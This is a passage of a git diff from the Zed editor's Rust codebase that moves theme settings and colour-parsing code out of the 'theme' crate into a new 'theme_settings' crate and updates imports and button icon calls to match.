theme_settings::deserialize_user_theme(&fs.load_bytes(&theme_path).await?)?; Ok(themes.themes.into_iter().map(|theme| theme.name).collect()) }) } @@ -41,12 +43,13 @@ impl ExtensionThemeProxy for ThemeRegistryProxy { fn load_user_theme(&self, theme_path: PathBuf, fs: Arc) -> Task> { let theme_registry = self.theme_registry.clone(); - self.executor - .spawn(async move { theme_registry.load_user_theme(&theme_path, fs).await }) + self.executor.spawn(async move { + theme_settings::load_user_theme(&theme_registry, &fs.load_bytes(&theme_path).await?) + }) } fn reload_current_theme(&self, cx: &mut App) { - GlobalTheme::reload_theme(cx) + theme_settings::reload_theme(cx) } fn list_icon_theme_names( @@ -55,7 +58,8 @@ impl ExtensionThemeProxy for ThemeRegistryProxy { fs: Arc, ) -> Task>> { self.executor.spawn(async move { - let icon_theme_family = theme::read_icon_theme(&icon_theme_path, fs).await?; + let icon_theme_family = + theme::deserialize_icon_theme(&fs.load_bytes(&icon_theme_path).await?)?; Ok(icon_theme_family .themes .into_iter() @@ -76,13 +80,13 @@ impl ExtensionThemeProxy for ThemeRegistryProxy { ) -> Task> { let theme_registry = self.theme_registry.clone(); self.executor.spawn(async move { - theme_registry - .load_icon_theme(&icon_theme_path, &icons_root_dir, fs) - .await + let icon_theme_family = + deserialize_icon_theme(&fs.load_bytes(&icon_theme_path).await?)?; + theme_registry.load_icon_theme(icon_theme_family, &icons_root_dir) }) } fn reload_current_icon_theme(&self, cx: &mut App) { - GlobalTheme::reload_icon_theme(cx) + theme_settings::reload_icon_theme(cx) } } diff --git a/crates/theme_importer/Cargo.toml b/crates/theme_importer/Cargo.toml index a91ffc44544f898be35c4514910a6081b10b4a26..a0b86a286de965143ba3ade4ee4cdff56cf773d4 100644 --- a/crates/theme_importer/Cargo.toml +++ b/crates/theme_importer/Cargo.toml @@ -22,4 +22,5 @@ serde_json_lenient.workspace = true simplelog.workspace= true strum = { workspace = true, features = ["derive"] } theme.workspace 
= true +theme_settings.workspace = true vscode_theme = "0.2.0" diff --git a/crates/theme_importer/src/vscode/converter.rs b/crates/theme_importer/src/vscode/converter.rs index b052e865265368234d7a1bed42957a714ca9d5bb..70b7c0e9f663c64d73cf9360dd7733c12f1fb5fe 100644 --- a/crates/theme_importer/src/vscode/converter.rs +++ b/crates/theme_importer/src/vscode/converter.rs @@ -1,7 +1,7 @@ use anyhow::Result; use collections::IndexMap; use strum::IntoEnumIterator; -use theme::{ +use theme_settings::{ FontStyleContent, FontWeightContent, HighlightStyleContent, StatusColorsContent, ThemeColorsContent, ThemeContent, ThemeStyleContent, WindowBackgroundContent, }; diff --git a/crates/theme_selector/Cargo.toml b/crates/theme_selector/Cargo.toml index 1a563e81f202b484c846ed620aee3edd122fc80b..41e0e7681436f1fd8d6bfe743528af7d4f3d3ad6 100644 --- a/crates/theme_selector/Cargo.toml +++ b/crates/theme_selector/Cargo.toml @@ -22,6 +22,7 @@ serde.workspace = true settings.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/theme_selector/src/icon_theme_selector.rs b/crates/theme_selector/src/icon_theme_selector.rs index 2ea3436d43cd2d2a4bda392384ff51f962824143..13d6a87c4ac9911bef7a86c9df84171644ca6cf9 100644 --- a/crates/theme_selector/src/icon_theme_selector.rs +++ b/crates/theme_selector/src/icon_theme_selector.rs @@ -7,10 +7,8 @@ use gpui::{ use picker::{Picker, PickerDelegate}; use settings::{Settings as _, SettingsStore, update_settings_file}; use std::sync::Arc; -use theme::{ - Appearance, IconThemeName, IconThemeSelection, SystemAppearance, ThemeMeta, ThemeRegistry, - ThemeSettings, -}; +use theme::{Appearance, SystemAppearance, ThemeMeta, ThemeRegistry}; +use theme_settings::{IconThemeName, IconThemeSelection, ThemeSettings}; use ui::{ListItem, ListItemSpacing, prelude::*, v_flex}; use util::ResultExt; use workspace::{ModalView, 
ui::HighlightedLabel}; @@ -176,7 +174,7 @@ impl PickerDelegate for IconThemeSelectorDelegate { let appearance = Appearance::from(window.appearance()); update_settings_file(self.fs.clone(), cx, move |settings, _| { - theme::set_icon_theme(settings, theme_name, appearance); + theme_settings::set_icon_theme(settings, theme_name, appearance); }); self.selector @@ -311,10 +309,11 @@ impl PickerDelegate for IconThemeSelectorDelegate { .border_color(cx.theme().colors().border_variant) .child( Button::new("docs", "View Icon Theme Docs") - .icon(IconName::ArrowUpRight) - .icon_position(IconPosition::End) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(|_event, _window, cx| { cx.open_url("https://zed.dev/docs/icon-themes"); }), diff --git a/crates/theme_selector/src/theme_selector.rs b/crates/theme_selector/src/theme_selector.rs index 74b242dd0b7c3a3ddbe6ca76d34a59f03560f14a..fb4d68a9da6f4a96e52fef288e58bdec90cae6fa 100644 --- a/crates/theme_selector/src/theme_selector.rs +++ b/crates/theme_selector/src/theme_selector.rs @@ -9,9 +9,9 @@ use gpui::{ use picker::{Picker, PickerDelegate}; use settings::{Settings, SettingsStore, update_settings_file}; use std::sync::Arc; -use theme::{ - Appearance, SystemAppearance, Theme, ThemeAppearanceMode, ThemeMeta, ThemeName, ThemeRegistry, - ThemeSelection, ThemeSettings, +use theme::{Appearance, SystemAppearance, Theme, ThemeMeta, ThemeRegistry}; +use theme_settings::{ + ThemeAppearanceMode, ThemeName, ThemeSelection, ThemeSettings, appearance_to_mode, }; use ui::{ListItem, ListItemSpacing, prelude::*, v_flex}; use util::ResultExt; @@ -233,7 +233,7 @@ impl ThemeSelectorDelegate { /// Overrides the global (in-memory) theme settings. /// /// Note that this does **not** update the user's `settings.json` file (see the -/// [`ThemeSelectorDelegate::confirm`] method and [`theme::set_theme`] function). 
+/// [`ThemeSelectorDelegate::confirm`] method and [`theme_settings::set_theme`] function). fn override_global_theme( store: &mut SettingsStore, new_theme: &Theme, @@ -303,7 +303,7 @@ fn update_mode_if_new_appearance_is_different_from_system( if original_mode == &ThemeAppearanceMode::System && system_appearance == new_appearance { ThemeAppearanceMode::System } else { - ThemeAppearanceMode::from(new_appearance) + appearance_to_mode(new_appearance) } } @@ -360,7 +360,7 @@ impl PickerDelegate for ThemeSelectorDelegate { telemetry::event!("Settings Changed", setting = "theme", value = theme_name); update_settings_file(self.fs.clone(), cx, move |settings, _| { - theme::set_theme(settings, theme_name, theme_appearance, system_appearance); + theme_settings::set_theme(settings, theme_name, theme_appearance, system_appearance); }); self.selector @@ -497,10 +497,11 @@ impl PickerDelegate for ThemeSelectorDelegate { .border_color(cx.theme().colors().border_variant) .child( Button::new("docs", "View Theme Docs") - .icon(IconName::ArrowUpRight) - .icon_position(IconPosition::End) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(cx.listener(|_, _, _, cx| { cx.open_url("https://zed.dev/docs/themes"); })), diff --git a/crates/theme_settings/Cargo.toml b/crates/theme_settings/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..dfe4fa0f79fb437a2b03c680642ac6b19a91d251 --- /dev/null +++ b/crates/theme_settings/Cargo.toml @@ -0,0 +1,37 @@ +[package] +name = "theme_settings" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[features] +default = [] +test-support = ["gpui/test-support", "settings/test-support", "theme/test-support"] + +[lib] +path = "src/theme_settings.rs" +doctest = false + +[dependencies] +anyhow.workspace = true +collections.workspace = 
true +gpui.workspace = true +gpui_util.workspace = true +log.workspace = true +palette = { workspace = true, default-features = false, features = ["std"] } +refineable.workspace = true +schemars.workspace = true +serde.workspace = true +serde_json.workspace = true +serde_json_lenient.workspace = true +settings.workspace = true +theme.workspace = true +uuid.workspace = true + +[dev-dependencies] +gpui = { workspace = true, features = ["test-support"] } +settings = { workspace = true, features = ["test-support"] } diff --git a/crates/theme_settings/LICENSE-GPL b/crates/theme_settings/LICENSE-GPL new file mode 120000 index 0000000000000000000000000000000000000000..89e542f750cd3860a0598eff0dc34b56d7336dc4 --- /dev/null +++ b/crates/theme_settings/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/crates/theme_settings/src/schema.rs b/crates/theme_settings/src/schema.rs new file mode 100644 index 0000000000000000000000000000000000000000..93eb4d30aa7ace9e10da3a0002dae3c6a6907d21 --- /dev/null +++ b/crates/theme_settings/src/schema.rs @@ -0,0 +1,850 @@ +#![allow(missing_docs)] + +use gpui::{HighlightStyle, Hsla}; +use palette::FromColor; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use settings::IntoGpui; +pub use settings::{ + FontStyleContent, HighlightStyleContent, StatusColorsContent, ThemeColorsContent, + ThemeStyleContent, +}; +pub use settings::{FontWeightContent, WindowBackgroundContent}; + +use theme::{StatusColorsRefinement, ThemeColorsRefinement}; + +/// The content of a serialized theme family. +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] +pub struct ThemeFamilyContent { + pub name: String, + pub author: String, + pub themes: Vec, +} + +/// The content of a serialized theme. 
+#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] +pub struct ThemeContent { + pub name: String, + pub appearance: theme::AppearanceContent, + pub style: settings::ThemeStyleContent, +} + +/// Returns the syntax style overrides in the [`ThemeContent`]. +pub fn syntax_overrides(this: &settings::ThemeStyleContent) -> Vec<(String, HighlightStyle)> { + this.syntax + .iter() + .map(|(key, style)| { + ( + key.clone(), + HighlightStyle { + color: style + .color + .as_ref() + .and_then(|color| theme::try_parse_color(color).ok()), + background_color: style + .background_color + .as_ref() + .and_then(|color| theme::try_parse_color(color).ok()), + font_style: style.font_style.map(|s| s.into_gpui()), + font_weight: style.font_weight.map(|w| w.into_gpui()), + ..Default::default() + }, + ) + }) + .collect() +} + +pub fn status_colors_refinement(colors: &settings::StatusColorsContent) -> StatusColorsRefinement { + StatusColorsRefinement { + conflict: colors + .conflict + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + conflict_background: colors + .conflict_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + conflict_border: colors + .conflict_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + created: colors + .created + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + created_background: colors + .created_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + created_border: colors + .created_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + deleted: colors + .deleted + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + deleted_background: colors + .deleted_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + deleted_border: colors + .deleted_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + error: colors + .error + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + error_background: colors + 
.error_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + error_border: colors + .error_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hidden: colors + .hidden + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hidden_background: colors + .hidden_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hidden_border: colors + .hidden_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hint: colors + .hint + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hint_background: colors + .hint_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hint_border: colors + .hint_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ignored: colors + .ignored + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ignored_background: colors + .ignored_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ignored_border: colors + .ignored_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + info: colors + .info + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + info_background: colors + .info_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + info_border: colors + .info_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + modified: colors + .modified + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + modified_background: colors + .modified_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + modified_border: colors + .modified_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + predictive: colors + .predictive + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + predictive_background: colors + .predictive_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + predictive_border: colors + .predictive_border + .as_ref() + .and_then(|color| 
try_parse_color(color).ok()), + renamed: colors + .renamed + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + renamed_background: colors + .renamed_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + renamed_border: colors + .renamed_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + success: colors + .success + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + success_background: colors + .success_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + success_border: colors + .success_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + unreachable: colors + .unreachable + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + unreachable_background: colors + .unreachable_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + unreachable_border: colors + .unreachable_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + warning: colors + .warning + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + warning_background: colors + .warning_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + warning_border: colors + .warning_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + } +} + +pub fn theme_colors_refinement( + this: &settings::ThemeColorsContent, + status_colors: &StatusColorsRefinement, +) -> ThemeColorsRefinement { + let border = this + .border + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let editor_document_highlight_read_background = this + .editor_document_highlight_read_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let scrollbar_thumb_background = this + .scrollbar_thumb_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or_else(|| { + this.deprecated_scrollbar_thumb_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + }); + let scrollbar_thumb_hover_background = 
this + .scrollbar_thumb_hover_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let scrollbar_thumb_active_background = this + .scrollbar_thumb_active_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_background); + let scrollbar_thumb_border = this + .scrollbar_thumb_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let element_hover = this + .element_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let panel_background = this + .panel_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let search_match_background = this + .search_match_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let search_active_match_background = this + .search_active_match_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(search_match_background); + ThemeColorsRefinement { + border, + border_variant: this + .border_variant + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + border_focused: this + .border_focused + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + border_selected: this + .border_selected + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + border_transparent: this + .border_transparent + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + border_disabled: this + .border_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + elevated_surface_background: this + .elevated_surface_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + surface_background: this + .surface_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + background: this + .background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_background: this + .element_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_hover, + element_active: this + .element_active + 
.as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_selected: this + .element_selected + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_disabled: this + .element_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_selection_background: this + .element_selection_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + drop_target_background: this + .drop_target_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + drop_target_border: this + .drop_target_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_background: this + .ghost_element_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_hover: this + .ghost_element_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_active: this + .ghost_element_active + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_selected: this + .ghost_element_selected + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_disabled: this + .ghost_element_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text: this + .text + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text_muted: this + .text_muted + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text_placeholder: this + .text_placeholder + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text_disabled: this + .text_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text_accent: this + .text_accent + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon: this + .icon + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon_muted: this + .icon_muted + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon_disabled: this + .icon_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + 
icon_placeholder: this + .icon_placeholder + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon_accent: this + .icon_accent + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + debugger_accent: this + .debugger_accent + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + status_bar_background: this + .status_bar_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + title_bar_background: this + .title_bar_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + title_bar_inactive_background: this + .title_bar_inactive_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + toolbar_background: this + .toolbar_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + tab_bar_background: this + .tab_bar_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + tab_inactive_background: this + .tab_inactive_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + tab_active_background: this + .tab_active_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + search_match_background, + search_active_match_background, + panel_background, + panel_focused_border: this + .panel_focused_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + panel_indent_guide: this + .panel_indent_guide + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + panel_indent_guide_hover: this + .panel_indent_guide_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + panel_indent_guide_active: this + .panel_indent_guide_active + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + panel_overlay_background: this + .panel_overlay_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(panel_background.map(ensure_opaque)), + panel_overlay_hover: this + .panel_overlay_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(panel_background + 
.zip(element_hover) + .map(|(panel_bg, hover_bg)| panel_bg.blend(hover_bg)) + .map(ensure_opaque)), + pane_focused_border: this + .pane_focused_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + pane_group_border: this + .pane_group_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(border), + scrollbar_thumb_background, + scrollbar_thumb_hover_background, + scrollbar_thumb_active_background, + scrollbar_thumb_border, + scrollbar_track_background: this + .scrollbar_track_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + scrollbar_track_border: this + .scrollbar_track_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + minimap_thumb_background: this + .minimap_thumb_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_background.map(ensure_non_opaque)), + minimap_thumb_hover_background: this + .minimap_thumb_hover_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_hover_background.map(ensure_non_opaque)), + minimap_thumb_active_background: this + .minimap_thumb_active_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_active_background.map(ensure_non_opaque)), + minimap_thumb_border: this + .minimap_thumb_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_border), + editor_foreground: this + .editor_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_background: this + .editor_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_gutter_background: this + .editor_gutter_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_subheader_background: this + .editor_subheader_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_active_line_background: this + .editor_active_line_background + .as_ref() + 
.and_then(|color| try_parse_color(color).ok()), + editor_highlighted_line_background: this + .editor_highlighted_line_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_debugger_active_line_background: this + .editor_debugger_active_line_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_line_number: this + .editor_line_number + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_hover_line_number: this + .editor_hover_line_number + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_active_line_number: this + .editor_active_line_number + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_invisible: this + .editor_invisible + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_wrap_guide: this + .editor_wrap_guide + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_active_wrap_guide: this + .editor_active_wrap_guide + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_indent_guide: this + .editor_indent_guide + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_indent_guide_active: this + .editor_indent_guide_active + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_document_highlight_read_background, + editor_document_highlight_write_background: this + .editor_document_highlight_write_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_document_highlight_bracket_background: this + .editor_document_highlight_bracket_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(editor_document_highlight_read_background), + terminal_background: this + .terminal_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_background: this + .terminal_ansi_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_foreground: this + .terminal_foreground + .as_ref() + 
.and_then(|color| try_parse_color(color).ok()), + terminal_bright_foreground: this + .terminal_bright_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_dim_foreground: this + .terminal_dim_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_black: this + .terminal_ansi_black + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_black: this + .terminal_ansi_bright_black + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_black: this + .terminal_ansi_dim_black + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_red: this + .terminal_ansi_red + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_red: this + .terminal_ansi_bright_red + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_red: this + .terminal_ansi_dim_red + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_green: this + .terminal_ansi_green + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_green: this + .terminal_ansi_bright_green + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_green: this + .terminal_ansi_dim_green + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_yellow: this + .terminal_ansi_yellow + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_yellow: this + .terminal_ansi_bright_yellow + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_yellow: this + .terminal_ansi_dim_yellow + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_blue: this + .terminal_ansi_blue + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_blue: this + .terminal_ansi_bright_blue + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_blue: 
this + .terminal_ansi_dim_blue + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_magenta: this + .terminal_ansi_magenta + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_magenta: this + .terminal_ansi_bright_magenta + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_magenta: this + .terminal_ansi_dim_magenta + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_cyan: this + .terminal_ansi_cyan + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_cyan: this + .terminal_ansi_bright_cyan + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_cyan: this + .terminal_ansi_dim_cyan + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_white: this + .terminal_ansi_white + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_white: this + .terminal_ansi_bright_white + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_white: this + .terminal_ansi_dim_white + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + link_text_hover: this + .link_text_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + version_control_added: this + .version_control_added + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.created), + version_control_deleted: this + .version_control_deleted + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.deleted), + version_control_modified: this + .version_control_modified + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.modified), + version_control_renamed: this + .version_control_renamed + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.modified), + version_control_conflict: this + .version_control_conflict + .as_ref() + .and_then(|color| 
try_parse_color(color).ok()) + .or(status_colors.ignored), + version_control_ignored: this + .version_control_ignored + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.ignored), + version_control_word_added: this + .version_control_word_added + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + version_control_word_deleted: this + .version_control_word_deleted + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + #[allow(deprecated)] + version_control_conflict_marker_ours: this + .version_control_conflict_marker_ours + .as_ref() + .or(this.version_control_conflict_ours_background.as_ref()) + .and_then(|color| try_parse_color(color).ok()), + #[allow(deprecated)] + version_control_conflict_marker_theirs: this + .version_control_conflict_marker_theirs + .as_ref() + .or(this.version_control_conflict_theirs_background.as_ref()) + .and_then(|color| try_parse_color(color).ok()), + vim_normal_background: this + .vim_normal_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_insert_background: this + .vim_insert_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_replace_background: this + .vim_replace_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_background: this + .vim_visual_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_line_background: this + .vim_visual_line_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_block_background: this + .vim_visual_block_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_yank_background: this + .vim_yank_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(editor_document_highlight_read_background), + vim_helix_normal_background: this + .vim_helix_normal_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_helix_select_background: this + 
.vim_helix_select_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_normal_foreground: this + .vim_normal_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_insert_foreground: this + .vim_insert_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_replace_foreground: this + .vim_replace_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_foreground: this + .vim_visual_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_line_foreground: this + .vim_visual_line_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_block_foreground: this + .vim_visual_block_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_helix_normal_foreground: this + .vim_helix_normal_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_helix_select_foreground: this + .vim_helix_select_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + } +} + +fn ensure_non_opaque(color: Hsla) -> Hsla { + const MAXIMUM_OPACITY: f32 = 0.7; + if color.a <= MAXIMUM_OPACITY { + color + } else { + Hsla { + a: MAXIMUM_OPACITY, + ..color + } + } +} + +fn ensure_opaque(color: Hsla) -> Hsla { + Hsla { a: 1.0, ..color } +} + +fn try_parse_color(color: &str) -> anyhow::Result { + let rgba = gpui::Rgba::try_from(color)?; + let rgba = palette::rgb::Srgba::from_components((rgba.r, rgba.g, rgba.b, rgba.a)); + let hsla = palette::Hsla::from_color(rgba); + + let hsla = gpui::hsla( + hsla.hue.into_positive_degrees() / 360., + hsla.saturation, + hsla.lightness, + hsla.alpha, + ); + + Ok(hsla) +} diff --git a/crates/theme/src/settings.rs b/crates/theme_settings/src/settings.rs similarity index 83% rename from crates/theme/src/settings.rs rename to crates/theme_settings/src/settings.rs index a092e2698722a980f0b2a4b5ea64b9bfa0f33d01..cda63ab9c8aa10d0f006f3bf371aab6491dff6de 
